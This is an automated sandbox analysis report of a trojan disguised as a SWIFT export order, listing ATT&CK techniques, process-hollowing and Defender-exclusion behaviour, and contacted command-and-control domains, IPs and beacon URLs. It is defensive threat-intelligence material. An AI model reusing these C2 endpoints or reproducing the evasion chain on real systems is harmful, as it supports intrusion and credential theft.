Source: Yara match; File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

(Digits following a technique name are the report's signature-hit markers for that technique, reproduced as extracted.)

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Command and Scripting Interpreter 2 | Scheduled Task/Job 1 | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 11 | LSASS Memory | Security Software Discovery 321 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Virtualization/Sandbox Evasion 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 112 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |

Behavior Graph

Behavior Graph ID: 528704
Sample: TT_SWIFT_Export Order_noref...
Startdate: 25/11/2021
Architecture: WINDOWS
Score: 100

Sample node
  DNS/IP: www.oki-net.com; www.elderlycareacademy.com; webredir.vip.gandi.net
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  started: TT_SWIFT_Export Order_noref S10SMG00318021.exe (6)
    dropped: C:\Users\user\AppData\Roaming\AnsPejV.exe (PE32); C:\Users\user\AppData\Local\Temp\tmp3FD.tmp (XML)
    Signatures: Adds a directory exclusion to Windows Defender
    started: TT_SWIFT_Export Order_noref S10SMG00318021.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      started: help.exe
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
      injected: explorer.exe
        DNS/IP: www.wamhsh.com 156.226.250.165, 49782, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; www.aarondecker.online 209.17.116.163, 49786, 80 DEFENSE-NETUS United States; 7 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
      started: autochk.exe
    started: powershell.exe (23)
      started: conhost.exe
    started: powershell.exe (25)
      started: conhost.exe
    started: schtasks.exe (1)
      started: conhost.exe

Screenshots

(Screenshot thumbnails are not reproduced in this text version.)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| TT_SWIFT_Export Order_noref S10SMG00318021.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

          Dropped Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Roaming\AnsPejV.exe | 36% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

          Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          Domains

          No Antivirus matches

          URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 | 100% | Avira URL Cloud | malware |
| http://www.wamhsh.com/46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 | 0% | Avira URL Cloud | safe |
| http://www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y | 0% | Avira URL Cloud | safe |
| www.liberia-infos.net/46uq/ | 100% | Avira URL Cloud | malware |
| http://www.pyjama-france.com/46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB | 0% | Avira URL Cloud | safe |

          Domains and IPs

          Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| webredir.vip.gandi.net | 217.70.184.50 | true | false | | high |
| www.oki-net.com | 154.196.11.204 | true | true | | unknown |
| hpsaddlerock.com | 34.102.136.180 | true | false | | unknown |
| www.wamhsh.com | 156.226.250.165 | true | true | | unknown |
| www.aarondecker.online | 209.17.116.163 | true | true | | unknown |
| shops.myshopify.com | 23.227.38.74 | true | true | | unknown |
| www.innovativepropsolutions.com | unknown | unknown | true | | unknown |
| www.754711.com | unknown | unknown | true | | unknown |
| www.pyjama-france.com | unknown | unknown | true | | unknown |
| www.hpsaddlerock.com | unknown | unknown | true | | unknown |
| www.elderlycareacademy.com | unknown | unknown | true | | unknown |
| www.blueharepress.com | unknown | unknown | true | | unknown |

                                  Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 | false | Avira URL Cloud: malware | unknown |
| http://www.wamhsh.com/46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 | true | Avira URL Cloud: safe | unknown |
| http://www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y | true | Avira URL Cloud: safe | unknown |
| www.liberia-infos.net/46uq/ | true | Avira URL Cloud: malware | low |
| http://www.pyjama-france.com/46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB | true | Avira URL Cloud: safe | unknown |

                                  URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://shop.gandi.net/en/domain/transfer | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://www.gandi.net/en | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://shop.gandi.net/en/domain/suggest?search=elderlycareacademy.com&amp;source=parking | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://news.gandi.net/en | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://www.gandi.net/en/security | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://www.gandi.net/en/simple-hosting | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://www.gandi.net/en/cloud | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://www.gandi.net/en/domain | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp | false | | high |
| https://help.gandi.net/en | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://whois.gandi.net/en/results?search=elderlycareacademy.com | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |
| https://shop.gandi.net/en | help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp | false | | high |

                                                          Contacted IPs


                                                          Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true |
| 34.102.136.180 | hpsaddlerock.com | United States | 15169 | GOOGLEUS | false |
| 156.226.250.165 | www.wamhsh.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true |
| 209.17.116.163 | www.aarondecker.online | United States | 55002 | DEFENSE-NETUS | true |

                                                          General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528704
Start date: 25.11.2021
Start time: 17:29:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: TT_SWIFT_Export Order_noref S10SMG00318021.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@16/10@9/4
EGA Information: Failed
HDC Information:
                                                          • Successful, ratio: 22.7% (good quality ratio 20.6%)
                                                          • Quality average: 73.2%
                                                          • Quality standard deviation: 31.2%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528704/sample/TT_SWIFT_Export Order_noref S10SMG00318021.exe

                                                          Simulations

                                                          Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 17:30:04 | API Interceptor | 91x Sleep call for process: TT_SWIFT_Export Order_noref S10SMG00318021.exe modified |
| 17:30:11 | API Interceptor | 67x Sleep call for process: powershell.exe modified |

                                                          Joe Sandbox View / Context

                                                          IPs

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 23.227.38.74 | Swift Copy TT.doc | malicious | www.raeofsunshinetn.com/x2bt/?RnYXZ=3UHTyQ9dQAmpbu3mQhG83SStnEqeJbC9ZiatD7nfsnFlwu2f+wNEgjCNUlF0v2Ue2O2RqA==&5jC=cjAPxlG0yV-H52L0 |
| 23.227.38.74 | DHL_AWB_DOCUMENT___pdf.exe | malicious | www.naplesvalleywebdesign.com/ubw4/?m6mP3=YfEDkZ7h&7nL0b=OLCg+iNjQ4/5CKIH/4vO2UNf4eQcTmxIlYL0xT/6lXMkKfqDh4KFSBJruaZMzSABrGYI |
| 23.227.38.74 | 1HT42224.xlsx | malicious | www.jhh-machines.com/znhk/?Vb=mZfX&uPkpIRL=0xZK/FtEi0PeovZ2RYDPSq4snltWgv1hKf3vVoDfj8YtoTA3OTHL8R131dAJBqZq2ef0IQ== |
| 23.227.38.74 | IAENMAI.xlsx | malicious | www.infinitecraftsanddesigns.com/rf5o/?rtc=uM4k2NTciReG+vb6o0FB4IMDgIadwcn6ey2KgF2WRfsLAv1imRtN3/cn/KcgKiMf2CZBYw==&lDHXg=alO4P2kXOFQl |
| 23.227.38.74 | Payment Swift 101,647.09.exe | malicious | www.alexanderpaddles.ca/hd6y/?UdC=7nyl2RZ0oBMpU8D&e2=Xmm/XwOf7drKQgtmJLfbZ/Bd8FZ+HU1dqhyukUWSpvePJaXqbGyRUp80PuyB5n9Xynbk |
| 23.227.38.74 | Requested payment Swift.xlsx | malicious | www.khaimzcollection.com/ky0y/?nF=w4/Gb35aQ2v07eTP0YdCOCamY1/kKgps7nouqKKmK3i3Pi6PWal2T/ea8RMKeI47BYQXzw==&V8P8=QBKT9Tf |
| 23.227.38.74 | vbc (1).exe | malicious | www.ribbonofficial.com/fqiq/?2dO8g=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe5O7hCcQbY9RgXjvg==&r0D034=9rCDgnnPXb |
| 23.227.38.74 | xpbSY3omz8.exe | malicious | www.infinitecraftsanddesigns.com/rf5o/?_B=uM4k2NTZiWeC+/X2q0FB4IMDgIadwcn6eyua8GqXV/sKAeZkhB8Bh7kl8vw2OyIs9BEx&w2Jhqn=S8-lp4npvnw |
| 23.227.38.74 | DHL express 5809439160_pdf.exe | malicious | www.xpressionsuk.com/asva/?0DHp3RF=FEQ/g93PZwAGQBEWi03pvor/xbPGdxzgRh/7BIeeyGVh6aLQ2fAt9EmS5cGut29us0ZSVvlKIQ==&hDKd=6lCpHHY0e2F0o |
| 23.227.38.74 | VSL_MV SEA-BLUE SHIP OWNERS.exe | malicious | www.petrestore.online/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=CNinYZfQbjuod4YtrGInxzMdpYuWjUUdL2k/U+JDvXlrF1AhCr50TzviVSUsxeoK3q9p |
| 23.227.38.74 | Shipment_21HT42223.exe | malicious | www.mybotanicalhome.com/znhk/?E8IxGN=PJEdJ8Kp32L&HXOTxB=nWDeKNlJ0lPd9WhgdUtayFSXx/Q226k1esXP2ML4lVJyrOJMzKeWbCVd34XYwJkEuNBGd7akmA== |
| 23.227.38.74 | Payment Swift Copy Of #U00a362,271.03.exe | malicious | www.alexanderpaddles.ca/hd6y/?2dQXRL=Xmm/XwOf7drKQgtmJLfbZ/Bd8FZ+HU1dqhyukUWSpvePJaXqbGyRUp80PuyB5n9Xynbk&n8HdXx=RhULbLA0f |
| 23.227.38.74 | DHL_AWB_NO#907853880911.exe | malicious | www.makheads.com/fl9w/?mfo=0pTLOHR&dFQ=2frggoHQAmdTpo/+PqnEOhc+P0KLimADn2Mb/WTE7JG8AaE973b8bWQ7k95u+MSXEt4c |
| 23.227.38.74 | PO.NX-48940.xlsx | malicious | www.superdrawme.com/s9m3/?zB=+cLzK+rH6VX68JQCgdg6kQaI+oShl9X2DEeuJuMbdgyHPh+PdkZ1oBpZ5YVSS1hKg1B5ug==&0r=6lgtZdm8X4 |
| 23.227.38.74 | wnRWWNwExD.exe | malicious | www.aoptuning.com/hicp/?9r=rvzQ6ICtD+MCRvqsH1aCoknmPJXGWr41wv774t1TU/WxQLSrVImSb68bZvexfspSSh9v&j8=4hRlM |
| 23.227.38.74 | SecuriteInfo.com.Trojan.Siggen15.46065.1499.exe | malicious | www.nine8culture.com/b62n/?k0GX=83F4fp1yruZnroW/kOIvr3sB5hYbb/6s2QnA4UYh8g2M2/1PMJPaF6rzqscjBlb2rtAd&s0=TfNLPvVpC4-lSFx |
| 23.227.38.74 | INVOICE BL DRAFT SHIPMENT DOCUMENTS PDF.exe | malicious | www.wickdawaycandles.com/c250/?4h=643Oymddn+tcb0q5RBNWv1SrT+yivvZEWmQSxgyhu8rxtyEhqtCiIwUEkbJMDkSghPiY&mZ1DoP=gvYLLbaxEP |
| 23.227.38.74 | PALMETTO STATE PARTS98_xlxs.exe | malicious | www.cabenomeubolso.com/cfb2/?DxlpdHd=F4ktUxUTF49fVWxPewWbXeqCMpTs0aD101LFFtI8a+Hr9ygfoztDMXMnCJVbN9+YV18z&N0D=p2MxC01 |
| 23.227.38.74 | doc028750_029.exe | malicious | www.commit2kindness.com/s4st/?aN90b=KVyLR83p1hG&Bz=DmuGwal32oLBULuuGoSJ8BTZBpJ+GiOdNAPYh2kZcU8TtmEMwc/RVFdJ73fmYN9v5+B4 |
| 23.227.38.74 | vGULtWc6Jh.exe | malicious | www.luxonealbery.com/scb0/?q6h=5jxdANKPGHO8HP5p&NBZ4cP=MCXI1I/kHZXMM3ei1jUWMR7W3vbdlGG8P75nDyYDpYJ4VysOTGBqhV+zBBRFwJxKfpELNUrugQ== |

                                                          Domains

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| webredir.vip.gandi.net | Incorrect_Payment Details MT144_SWIFT.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Besjuju.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | DuxgwH47QB.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Company profile.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | SOA & INV FOR OCT'21.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Drawings HQ30-DM140.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Drawings HQ30-DM140.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | ZFPpWtPkYW.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | file0_stage3.dll | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Port_UETQYDYA_99381,pdf.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | D4L4075.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | E1PGk0W2AH.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Purchase Order.doc | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | REQUEST FOR QUOTATION (2).exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Diagram and Specifications.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | Br5q8mvTpP.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | ckx3O50hMB.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | vkASLnL3Q6.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | ETC 813 TXG-PKG_CFS_SO0704_(Arsen_LOGISTICS),pdf.exe | malicious | 217.70.184.50 |
| webredir.vip.gandi.net | E20210917ML-RFQ.exe | malicious | 217.70.184.50 |
| www.oki-net.com | PO_No.202201EYL-01_ABW.exe | malicious | 154.196.5.131 |
| www.aarondecker.online | PO_No.202201EYL-01_ABW.exe | malicious | 209.17.116.163 |
| shops.myshopify.com | Swift Copy TT.doc | malicious | 23.227.38.74 |
| shops.myshopify.com | DHL_AWB_DOCUMENT___pdf.exe | malicious | 23.227.38.74 |
| shops.myshopify.com | 1HT42224.xlsx | malicious | 23.227.38.74 |
| shops.myshopify.com | IAENMAI.xlsx | malicious | |
                                                          • 23.227.38.74
                                                          Payment Swift 101,647.09.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Requested payment Swift.xlsxGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          vbc (1).exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          xpbSY3omz8.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          VSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Shipment_21HT42223.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Payment Swift Copy Of #U00a362,271.03.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          DHL_AWB_NO#907853880911.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          PO.NX-48940.xlsxGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          wnRWWNwExD.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Purchase Order#4250008195-HK.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          SecuriteInfo.com.Trojan.Siggen15.46065.1499.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          INVOICE BL DRAFT SHIPMENT DOCUMENTS PDF.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          PALMETTO STATE PARTS98_xlxs.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 22172
Entropy (8bit): 5.604663680796553
Encrypted: false
SSDEEP: 384:5tCDqiw55+8+L3p/mQ9RX+ReBS0n4jultI277Y9gxSJ3xCT1MabZlbAV7tNiWDWi:ZAL3p/mMNT4CltJfxcQCqfwBNQVq
MD5: 5FB1F2A73499F0915A78C3AC50BE1B07
SHA1: 8EE5A7E5FB66313371ECD18C20196F695F18D3CB
SHA-256: F033460017CB192F6AFA7E662803081BA0612D827432B9275B692E9FBDB6F5E3
SHA-512: 18E7B1070994BB1A2C29160847D24B06D2BFBEA2B19343DA76D5BB67F7348188488DB16A6D490CF14D7D8C379B30D86EEDD9CEDE042CFC213BA212F6238DCD7D
Malicious: false
Reputation: low
Preview: @...e...........`.......h...X.N.K.........I..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ic10stv.gry.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3vwogde.4ck.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5nzkl2.tah.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys5lr1qk.smh.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
